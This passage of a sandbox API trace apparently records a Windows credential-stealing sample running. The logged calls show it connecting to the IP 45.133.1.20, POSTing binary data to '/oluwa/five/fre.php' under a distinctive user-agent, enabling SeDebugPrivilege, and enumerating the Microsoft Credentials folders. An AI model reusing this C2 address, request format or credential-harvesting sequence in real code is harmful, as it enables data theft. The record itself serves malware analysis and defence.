(lpLibFileName="shlwapi") returned 0x77680000 [0131.577] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0131.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0131.578] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0131.578] GetProcessHeap () returned 0x6a0000 [0131.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0131.590] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0131.590] GetProcessHeap () returned 0x6a0000 [0131.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0131.591] socket (af=2, type=1, protocol=6) returned 0x240 [0132.419] connect (s=0x240, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0132.556] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0132.556] GetProcessHeap () returned 0x6a0000 [0132.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf468 [0132.564] GetProcessHeap () returned 0x6a0000 [0132.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6bf4f0 [0132.567] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.568] wvsprintfA (in: param_1=0x6bf4f0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f958 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0132.568] GetProcessHeap () returned 0x6a0000 [0132.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c1518 [0132.568] GetProcessHeap () returned 0x6a0000 [0132.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf4f0 | out: hHeap=0x6a0000) returned 1 [0132.569] GetProcessHeap () returned 0x6a0000 [0132.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0132.569] GetProcessHeap () returned 0x6a0000 [0132.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6bf4f0 [0132.570] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.571] wvsprintfA (in: param_1=0x6bf4f0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f958 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 288\r\nConnection: close\r\n\r\n") returned 242 [0132.571] GetProcessHeap () returned 0x6a0000 [0132.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6c15d8 [0132.571] GetProcessHeap () returned 0x6a0000 [0132.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf4f0 | out: hHeap=0x6a0000) returned 1 [0132.572] send (s=0x240, buf=0x6c15d8*, len=242, flags=0) returned 242 [0132.573] send (s=0x240, buf=0x6bb458*, len=288, flags=0) returned 288 [0132.574] GetProcessHeap () returned 0x6a0000 [0132.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf4f0 [0132.574] recv (in: s=0x240, buf=0x6bf4f0, len=4048, flags=0 | out: buf=0x6bf4f0*) returned 196 [0132.636] GetProcessHeap () returned 0x6a0000 [0132.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c15d8 | out: hHeap=0x6a0000) returned 1 [0132.636] GetProcessHeap () returned 0x6a0000 [0132.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0132.638] GetProcessHeap () returned 0x6a0000 [0132.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c1518 | out: hHeap=0x6a0000) returned 1 [0132.639] GetProcessHeap () returned 0x6a0000 [0132.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf468 | out: hHeap=0x6a0000) returned 1 [0132.639] closesocket (s=0x240) returned 0 [0132.640] GetProcessHeap () returned 0x6a0000 [0132.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0132.641] GetProcessHeap () returned 0x6a0000 [0132.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd1c8 | out: hHeap=0x6a0000) returned 1 [0132.642] GetProcessHeap () returned 0x6a0000 [0132.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b48c8 | out: hHeap=0x6a0000) returned 1 [0132.642] GetProcessHeap () returned 0x6a0000 [0132.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0132.642] GetProcessHeap () returned 0x6a0000 [0132.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bd1c8 [0132.644] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0132.645] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bd1c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0132.645] GetProcessHeap () returned 0x6a0000 [0132.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6c04c8 [0132.647] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.648] wvsprintfW (in: param_1=0x6c04c8, param_2="%s\\%s", arglist=0x19f988 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0132.648] GetProcessHeap () returned 0x6a0000 [0132.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6bcaf0 [0132.648] GetProcessHeap () returned 0x6a0000 [0132.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c04c8 | out: hHeap=0x6a0000) returned 1 [0132.649] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0132.651] GetProcessHeap () returned 0x6a0000 [0132.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f50) returned 0x6c04c8 [0132.652] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.653] wvsprintfW (in: param_1=0x6c04c8, param_2="%s\\%s.%s", arglist=0x19f99c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb") returned 55 [0132.653] GetProcessHeap () returned 0x6a0000 [0132.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x72) returned 0x6b8660 [0132.653] GetProcessHeap () returned 0x6a0000 [0132.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c04c8 | out: hHeap=0x6a0000) returned 1 [0132.654] GetProcessHeap () returned 0x6a0000 [0132.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcaf0 | out: hHeap=0x6a0000) returned 1 [0132.655] GetProcessHeap () returned 0x6a0000 [0132.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd1c8 | out: hHeap=0x6a0000) returned 1 [0132.657] VirtualQuery (in: lpAddress=0x5b0000, lpBuffer=0x19fb34, dwLength=0x1c | out: lpBuffer=0x19fb34*(BaseAddress=0x5b0000, AllocationBase=0x5b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.658] VirtualQuery (in: lpAddress=0x5b0000, lpBuffer=0x19fb14, dwLength=0x1c | out: lpBuffer=0x19fb14*(BaseAddress=0x5b0000, AllocationBase=0x5b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.659] VirtualAlloc (lpAddress=0x0, dwSize=0x1004, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000 [0132.661] VirtualFree (lpAddress=0x5b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.662] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb")) returned 0 [0132.663] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.hdb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.hdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0132.666] SetFilePointer (in: hFile=0x240, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.667] WriteFile (in: hFile=0x240, lpBuffer=0x5c0000*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x19fb3c, lpOverlapped=0x0 | out: lpBuffer=0x5c0000*, lpNumberOfBytesWritten=0x19fb3c*=0x4, lpOverlapped=0x0) returned 1 [0132.670] CloseHandle (hObject=0x240) returned 1 [0132.672] GetProcessHeap () returned 0x6a0000 [0132.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8660 | out: hHeap=0x6a0000) returned 1 [0132.673] GetProcessHeap () returned 0x6a0000 [0132.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf4f0 | out: hHeap=0x6a0000) returned 1 [0132.674] GetProcessHeap () returned 0x6a0000 [0132.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0132.674] GetProcessHeap () returned 0x6a0000 [0132.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0132.675] GetProcessHeap () returned 0x6a0000 [0132.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x6a0000) returned 1 [0132.675] GetProcessHeap () returned 0x6a0000 [0132.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0132.675] GetProcessHeap () returned 0x6a0000 [0132.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0132.675] GetProcessHeap () returned 0x6a0000 [0132.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab580 | out: hHeap=0x6a0000) returned 1 [0132.675] GetProcessHeap () returned 0x6a0000 [0132.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1388) returned 0x6b5c98 [0132.676] GetProcessHeap () returned 0x6a0000 [0132.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6beb50 [0132.739] GetProcessHeap () returned 0x6a0000 [0132.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bd1c8 [0132.740] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0132.741] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bd1c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0132.741] GetProcessHeap () returned 0x6a0000 [0132.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bf370 [0132.749] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.750] wvsprintfW (in: param_1=0x6bf370, param_2="%s\\%s", arglist=0x19f9e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0132.750] GetProcessHeap () returned 0x6a0000 [0132.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5c) returned 0x6bcaf0 [0132.751] GetProcessHeap () returned 0x6a0000 [0132.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0132.752] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0132.752] GetProcessHeap () returned 0x6a0000 [0132.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f50) returned 0x6bf370 [0132.753] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.754] wvsprintfW (in: param_1=0x6bf370, param_2="%s\\%s.%s", arglist=0x19f9f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 55 [0132.754] GetProcessHeap () returned 0x6a0000 [0132.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x72) returned 0x6b8660 [0132.754] GetProcessHeap () returned 0x6a0000 [0132.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0132.755] GetProcessHeap () returned 0x6a0000 [0132.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcaf0 | out: hHeap=0x6a0000) returned 1 [0132.756] GetProcessHeap () returned 0x6a0000 [0132.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd1c8 | out: hHeap=0x6a0000) returned 1 [0132.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.758] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck") returned 0 [0132.758] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0132.760] SetFilePointer (in: hFile=0x240, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.761] WriteFile (in: hFile=0x240, lpBuffer=0x19fbbc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19fb80, lpOverlapped=0x0 | out: lpBuffer=0x19fbbc*, lpNumberOfBytesWritten=0x19fb80*=0x1, lpOverlapped=0x0) returned 1 [0132.764] CloseHandle (hObject=0x240) returned 1 [0132.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0132.766] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb9c, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fba4 | out: pSid=0x19fba4*=0x6beb08*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0132.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0132.767] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x6beb08*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fba8 | out: IsMember=0x19fba8) returned 1 [0132.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0132.802] GetCurrentProcess () returned 0xffffffff [0132.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0132.803] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19fba4 | out: TokenHandle=0x19fba4*=0x248) returned 1 [0132.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0132.805] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19fb9c | out: lpLuid=0x19fb9c*(LowPart=0x14, HighPart=0)) returned 1 [0132.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0132.809] AdjustTokenPrivileges (in: TokenHandle=0x248, DisableAllPrivileges=0, NewState=0x19fb8c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0132.809] CloseHandle (hObject=0x248) returned 1 [0132.809] GetProcessHeap () returned 0x6a0000 [0132.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bd1c8 [0132.810] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0132.811] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bd1c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0132.811] GetProcessHeap () returned 0x6a0000 [0132.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f70) returned 0x6bf370 [0132.812] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.813] wvsprintfW (in: param_1=0x6bf370, param_2="%s\\Microsoft\\Credentials", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 59 [0132.813] GetProcessHeap () returned 0x6a0000 [0132.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6bae98 [0132.813] GetProcessHeap () returned 0x6a0000 [0132.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0132.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.827] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials") returned 1 [0132.828] GetProcessHeap () returned 0x6a0000 [0132.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd1c8 | out: hHeap=0x6a0000) returned 1 [0132.829] Sleep (dwMilliseconds=0xa) [0132.865] GetProcessHeap () returned 0x6a0000 [0132.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f48) returned 0x6bf370 [0132.866] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.867] wvsprintfW (in: param_1=0x6bf370, param_2="%s\\*", arglist=0x19f904 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0132.867] GetProcessHeap () returned 0x6a0000 [0132.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e) returned 0x6baf20 [0132.867] GetProcessHeap () returned 0x6a0000 [0132.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0132.869] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6acfa0 [0132.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.870] StrStrW (lpFirst=".", lpSrch="Windows") returned 0x0 [0132.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.872] StrStrW (lpFirst=".", lpSrch="Program Files") returned 0x0 [0132.872] FindNextFileW (in: hFindFile=0x6acfa0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.874] StrStrW (lpFirst="..", lpSrch="Windows") returned 0x0 [0132.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.875] StrStrW (lpFirst="..", lpSrch="Program Files") returned 0x0 [0132.876] FindNextFileW (in: hFindFile=0x6acfa0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0132.876] FindClose (in: hFindFile=0x6acfa0 | out: hFindFile=0x6acfa0) returned 1 [0132.876] GetProcessHeap () returned 0x6a0000 [0132.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baf20 | out: hHeap=0x6a0000) returned 1 [0132.877] GetProcessHeap () returned 0x6a0000 [0132.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bf370 [0132.878] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.878] wvsprintfW (in: param_1=0x6bf370, param_2="%s\\%s", arglist=0x19f900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 61 [0132.879] GetProcessHeap () returned 0x6a0000 [0132.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e) returned 0x6baf20 [0132.879] GetProcessHeap () returned 0x6a0000 [0132.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0132.880] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ad4a0 [0132.880] FindNextFileW (in: hFindFile=0x6ad4a0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.881] FindNextFileW (in: hFindFile=0x6ad4a0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0132.881] FindClose (in: hFindFile=0x6ad4a0 | out: hFindFile=0x6ad4a0) returned 1 [0132.881] GetProcessHeap () returned 0x6a0000 [0132.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baf20 | out: hHeap=0x6a0000) returned 1 [0132.882] GetProcessHeap () returned 0x6a0000 [0132.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0132.883] GetProcessHeap () returned 0x6a0000 [0132.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bd1c8 [0132.883] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0132.884] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6bd1c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0132.884] GetProcessHeap () returned 0x6a0000 [0132.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f70) returned 0x6bf370 [0132.885] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.886] wvsprintfW (in: param_1=0x6bf370, param_2="%s\\Microsoft\\Credentials", arglist=0x19fb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 57 [0132.886] GetProcessHeap () returned 0x6a0000 [0132.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x6b7c60 [0132.886] GetProcessHeap () returned 0x6a0000 [0132.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0132.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.887] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 1 [0132.888] GetProcessHeap () returned 0x6a0000 [0132.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd1c8 | out: hHeap=0x6a0000) returned 1 [0132.889] Sleep (dwMilliseconds=0xa) [0132.919] GetProcessHeap () returned 0x6a0000 [0132.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f48) returned 0x6bf370 [0132.920] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.921] wvsprintfW (in: param_1=0x6bf370, param_2="%s\\*", arglist=0x19f8ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned 59 [0132.921] GetProcessHeap () returned 0x6a0000 [0132.921] RtlAllocateHeap 